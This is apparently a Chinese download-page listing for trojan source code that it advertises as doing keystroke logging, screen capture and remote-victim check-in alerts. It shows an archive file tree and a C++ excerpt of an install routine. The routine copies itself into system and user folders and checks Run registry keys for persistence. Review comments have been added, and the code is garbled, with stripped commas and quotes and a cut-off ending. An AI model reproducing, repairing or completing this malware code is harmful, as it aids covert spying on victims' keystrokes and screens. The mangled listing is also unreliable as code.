资源简介

Trojan源码,可进行键盘记录,屏幕抓取,远程靶机上线提示

代码片段和文件信息

#include 
#include 
#include “main.h“
#include “shared/include/maindef.h“
#include “shared/include/osversion.h“
#include “shared/include/ofuscstring.h“
#include “shared/include/loadDll.h“
#include “shared/include/structdll.h“
#include “shared/include/CHTTPClass.h“

/*
 * Function-pointer types, all using the WINAPI calling convention.
 *
 *   fnGETVERSION   - takes no arguments, returns int.
 *   fnSTARTPAYLOAD - takes a PARAMETERS pointer, returns nothing.
 *   fnSTOPPAYLOAD  - takes no arguments, returns nothing.
 *
 * NOTE(review): presumably these are the signatures of entry points looked
 * up at run time in a separately loaded module (loadDll.h is included above
 * and the archive listing has a dll/ tree); the lookup itself is not in this
 * excerpt, so confirm against the full source.
 * NOTE(review): if that holds, this executable's static import table would
 * under-report what the sample can do, and analysis and detection should
 * also cover the module exposing the matching exports.
 */
typedef int (WINAPI *fnGETVERSION)(void);
typedef void (WINAPI *fnSTARTPAYLOAD)(PARAMETERS *pParam);
typedef void (WINAPI *fnSTOPPAYLOAD)(void);

/*
 * Forward declaration of the window procedure; its definition is not part of
 * this excerpt.
 * NOTE(review): the parameter list has lost its comma separators in this
 * listing, as have the calls further down the page; the line is kept exactly
 * as published and will not compile in this form.
 */
LRESULT CALLBACK WindowProcedure (HWND UINT WPARAM LPARAM);

bool install(API *pApi PARAMETERS *pParam) {
    char *svCommandLine; char *svCommandLine2;char svTargetName1[MAX_PATH];
    char svTargetName2[MAX_PATH];char svRegPath[MAX_PATH];char svTargetName3[MAX_PATH];
    char stCommandLine[MAX_PATH];
    char *svRunRegKey;char *svTargetName; bool bInstalled=false;
    DWORD dwLenght=512; DWORD lpType=REG_SZ; HKEY key;int i;
    
    _sleep(5000);


    sprintf(svTargetName3“%s%s“pParam->sTmpDirectorySTR_MAIN_PROCESSNAME);
    wsprintf(svTargetName1“%s\\%s“pParam->sSystemDirectorySTR_MAIN_PROCESSNAME);
    wsprintf(svTargetName2“%s\\Microsoft\\%s“pParam->sMyDocumentsSTR_MAIN_PROCESSNAME);

    strcpy(stCommandLineGetCommandLine());
    svCommandLine=stCommandLine;
    if (*svCommandLine==‘“‘) {
      svCommandLine++;
      *(svCommandLine+strlen(svCommandLine)-2)=0;                         
    }
    
    svCommandLine2=GetCommandLine();
    while (*svCommandLine2!=‘\0‘)
    {
          if (*svCommandLine2==‘ ‘ && *(svCommandLine-4)==‘.‘)
             *svCommandLine2=0;
          svCommandLine2++;
    }
    
    if(bIsWinNT) {
svRunRegKey=STR_INSTALL_KEY1;
} else {
svRunRegKey=STR_INSTALL_KEY2;
}

    if((GetFileAttributes(svTargetName1)!=0xFFFFFFFF) || (GetFileAttributes(svTargetName2)!=0xFFFFFFFF)){
        dwLenght=MAX_PATH;
        if (GetFileAttributes(svTargetName1)!=0xFFFFFFFF)
           strcpy(pParam->sInstalledRepsvTargetName1);
        else   
           strcpy(pParam->sInstalledRepsvTargetName2);
        
        
        if(pApi->pRegOpenKeyEx(HKEY_LOCAL_MACHINEsvRunRegKey0KEY_READ&key)==ERROR_SUCCESS)
            if (pApi->pRegQueryValueEx(keySTR_MAIN_KEYNAME0&lpType (BYTE *)svRegPath&dwLenght)==ERROR_SUCCESS) {
               strcpy(pParam->sInstalledKeysvRunRegKey);
               return true;
            }

        dwLenght=MAX_PATH;
        if (pApi->pRegOpenKey(HKEY_CURRENT_USERSTR_INSTALL_KEY1&key)==ERROR_SUCCESS)
          if (pApi->pRegQueryValueEx(keySTR_MAIN_KEYNAMENULLNULL(BYTE *)svRegPath&dwLenght)==ERROR_SUCCESS) {
                  strcpy(pParam->sInstalledKeysvRunRegKey);
                  return true;
          }
    }

    dwLenght=MAX_PATH;

    if((GetFileAttributes(svTargetName1)==0xFFFFFFFF) && (GetFileAttributes(svTargetName2)==0xFFFFFFFF))
    {
         if(CopyFile(svCommandLinesvTargetName1false))
            svTargetName=svTarg

 属性            大小     日期    时间   名称
----------- ---------  ---------- -----  ----
     目录           0  2014-01-09 16:43  trojan-master\
     目录           0  2014-01-09 16:43  trojan-master\2003\
     文件       86969  2014-01-09 16:43  trojan-master\2003\index.cst
     文件           4  2014-01-09 16:43  trojan-master\2003\version.php
     文件        1728  2014-01-09 16:43  trojan-master\Makefile.win
     文件         543  2014-01-09 16:43  trojan-master\README.md
     目录           0  2014-01-09 16:43  trojan-master\dll\
     文件        2113  2014-01-09 16:43  trojan-master\dll\Makefile.win
     目录           0  2014-01-09 16:43  trojan-master\dll\include\
     文件         830  2014-01-09 16:43  trojan-master\dll\include\CCmdExec.h
     文件        1227  2014-01-09 16:43  trojan-master\dll\include\ComManager.h
     文件         292  2014-01-09 16:43  trojan-master\dll\include\dll.h
     文件         831  2014-01-09 16:43  trojan-master\dll\include\function.h
     文件         631  2014-01-09 16:43  trojan-master\dll\include\trojr1_private.h
     目录           0  2014-01-09 16:43  trojan-master\dll\source\
     文件        4444  2014-01-09 16:43  trojan-master\dll\source\CCmdExec.cpp
     文件        6406  2014-01-09 16:43  trojan-master\dll\source\ComManager.cpp
     文件        3664  2014-01-09 16:43  trojan-master\dll\source\dllmain.cpp
     文件       12917  2014-01-09 16:43  trojan-master\dll\source\function.cpp
     文件        8463  2014-01-09 16:43  trojan-master\dll\source\main.cpp
     文件        1025  2014-01-09 16:43  trojan-master\dll\source\w32audio.dev
     文件        4377  2014-01-09 16:43  trojan-master\dll\w32audio.dev
     文件        1897  2014-01-09 16:43  trojan-master\dll\w32audio.layout
     文件        9071  2014-01-09 16:43  trojan-master\main.cpp
     文件         206  2014-01-09 16:43  trojan-master\main.h
     目录           0  2014-01-09 16:43  trojan-master\shared\
     目录           0  2014-01-09 16:43  trojan-master\shared\include\
     文件        2776  2014-01-09 16:43  trojan-master\shared\include\CHTTPClass.h
     文件         148  2014-01-09 16:43  trojan-master\shared\include\libc.h
     文件        5882  2014-01-09 16:43  trojan-master\shared\include\loadDll.h
     文件        1259  2014-01-09 16:43  trojan-master\shared\include\maindef.h
............此处省略11个文件信息
